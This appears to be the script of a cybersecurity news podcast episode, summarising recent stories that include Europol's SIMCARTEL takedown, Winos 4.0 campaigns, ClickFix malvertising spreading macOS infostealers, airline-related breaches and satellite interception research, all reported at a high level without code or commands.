In today’s cybersecurity news…
Europol dismantles 49 million fake account SIM farm
On Friday, the European Union’s law enforcement agency Europol announced the disruption of a sophisticated cybercrime-as-a-service (CaaS) platform that ran a SIM farm which enabled phishing and investment fraud. The agency’s operation, SIMCARTEL involved 26 searches, and made seven arrests along with the seizure of 1,200 SIM box devices with 40,000 active SIM cards, which had enabled the creation of more than 49 million online accounts. The operation, which involved the cooperation of Austria, Estonia, Finland, Latvia, Europol, and Eurojust (the European Union Agency for Criminal Justice Cooperation), targeted a network linked to over 3,200 cyber fraud cases in Austria and Latvia, causing combined losses exceeding €4.9 million.
China’s Silver Fox group takes Winos 4.0 to Japan and Malaysia
The group behind the Winos 4.0 malware family is making the headlines again, expanding their footprint of targets beyond China and Taiwan to include Japan and Malaysia, and including another remote access trojan, which is being tracked as HoldingHands RAT (aka Gh0stBins). A researcher with Fortinet’s FortiGuard Labs stated in a report that the campaign “relied on phishing emails with PDFs that contained embedded malicious links…these files masqueraded as official documents from the Ministry of Finance and included numerous links in addition to the one that delivered Winos 4.0.” The malware is generally attributed to a Chinese cybercrime group known as Silver Fox.
Increased use of AI in extortion and ransomware cyberattacks, says Microsoft
Following up on a story we covered on Friday’s Cyber Security Headlines as well in a great discussion in the Week In Review show, Microsoft’s annual Digital Threats Report shows that in addition to the proliferation of password attacks, that AI is increasingly being used by threat actors to boost their power, by “automating phishing, scaling social engineering, creating synthetic media, finding vulnerabilities faster, and creating malware that can adapt itself.” The report also adds that defenders are also increasing their usage of AI to “spot threats, close detection gaps, catch phishing attempts, and protect vulnerable users.” A link to the report is available in the show notes to this episode.
Envoy Air confirms Oracle E-Business Suite compromise
The airline, which is a regional and wholly owned subsidiary of American Airlines has become the second company to confirm the theft of information as a result of a breach of their Oracle E-Business Suite application. The hacking campaign is alleged to be run by the Russian Clop group, and it obtained what is being described as a “limited amount of business information and commercial contact details.” The Clop gang apparently made a claim that it had stolen information from American Airlines, by adding the company to its leak site, however, a spokesperson for American Airlines said the claim “pertained to Envoy Air and that American Airlines itself does not use the Oracle E-Business Suite application.(The Record)
Huge thanks to our sponsor, ThreatLocker
Google ads for fake Homebrew, LogMeIn sites push infostealers
On September 2, we reported on cybercriminals abusing Meta’s advertising platforms with fake offers of a free TradingView Premium app that spread the Brokewell malware for Android. Now, a new campaign is targeting macOS developers with fake platforms for TradingView, Homebrew, LogMeIn, to deliver infostealing malware like AMOS (Atomic macOS Stealer) and Odyssey. This new campaign uses “ClickFix” techniques that fool people into executing commands in Terminal, by trying to fix a problem on a log in dialog box, or a connection security confirmation step for example. This leads the victims to infecting themselves with malware. When checking some of the fake domains included in this campaign, BleepingComputer discovered that “in some cases the traffic to the sites was driven via Google Ads, indicating that the threat actor promoted them to appear in Google Search results.”
Cybercrime group Everest claims Collins Aerospace hack but mystery surrounds the story
The attack on European airports including Heathrow, Brussels, and Berlin, dominated the news in September and even resulted in the arrest of one individual. Now, the Everest group has claimed responsibility for the cyberattack on Collins Aerospace that resulted in chaos for these airports, their employees, and passengers. However, shortly after making the statement, their leak site went dark, showing only a “Fatal Error” message. As posted in Security Affairs, the Everest group itself is “part of a new generation of cybercriminal organizations that operate with a hybrid model. Instead of executing full-scale attacks alone, they often act as brokers, selling stolen access or partnering with affiliates who specialize in different stages of the intrusion chain.” Speculation now abounds as to the closure of their site, which might be due to a law enforcement takedown, or could simply be a tactical retreat.
Infostealing from space is easier than you think
Researchers from the University of Maryland and the University of California San Diego say they were “able to intercept sensitive data from the U.S. military, telecommunications firms, major businesses and organizations by passively scanning and collecting unencrypted data from the satellites responsible for beaming that information across the globe.” The team focused on geostationary satellites and used inexpensive, commercially available equipment. They stated that “many organizations do not routinely monitor the security of their own satellite communication links” and that content scrambling “is surprisingly unlikely to be used for private networks using GEO satellite to backhaul IP network traffic from remote areas.” A link to this report is available in the show notes to this episode.
SolarWinds security chief Tim Brown reflects on the 2020 hack
Speaking at Melbourne’s CyberCon last Friday, Brown recalls the December 12 hack and its implications for the company he worked for as well as for its 300,000 customers. Occurring as it did during the peak of the Covid-19 pandemic, the email platform his team relied on for communication during lockdown was unavailable and all of his team had to return to the office. “You get the world wanting verbal communication,” he said, “not written communication. And that is a kind of an important lesson: you can write things down, but they want to talk to the CISO.” The stress and resulting lawsuits led to Brown suffering a heart attack. He is still CISO at SolarWinds.